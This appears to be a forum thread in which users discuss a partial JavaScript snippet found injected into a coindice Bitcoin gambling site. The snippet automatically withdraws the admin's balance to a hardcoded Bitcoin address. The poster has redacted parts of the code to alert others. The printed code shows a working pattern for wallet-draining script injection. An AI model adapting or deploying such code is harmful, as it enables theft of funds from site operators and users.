Author

Topic: Java Script Embedded to Steal BTC? (Read 668 times)

full member
Activity: 154
Merit: 100
Pm me if you're a casino developer!
April 17, 2014, 03:58:13 AM
#2
Today another user posted a link to his site based on the coindice script and right off the bat I noticed it was running a java script and from what I can tell it was stealing BTC after you had x amount.

I have included the PARTIAL script here to prevent scumbags from modifying the code for their own use but I just want to confirm that im not jumping to conclusions about what the script does..

I did contact the website owner and he has removed it. 

Code:
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",THIS BIT OF CODE HAS BEEN REMOVED
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':THIS BIT OF CODE HAS BEEN REMOVED
refreshBalancehaxored();}},1000);


Yeah I've seen this shit coindice script made by some Ukraine.  And that code was a orchestrated hack I believe and could potentially be used again if resold.     
full member
Activity: 210
Merit: 100
April 15, 2014, 10:28:45 PM
#1
Today another user posted a link to his site based on the coindice script and right off the bat I noticed it was running a java script and from what I can tell it was stealing BTC after you had x amount.

I have included the PARTIAL script here to prevent scumbags from modifying the code for their own use but I just want to confirm that im not jumping to conclusions about what the script does..

I did contact the website owner and he has removed it. 

Code:
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",THIS BIT OF CODE HAS BEEN REMOVED
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':THIS BIT OF CODE HAS BEEN REMOVED
refreshBalancehaxored();}},1000);
Jump to: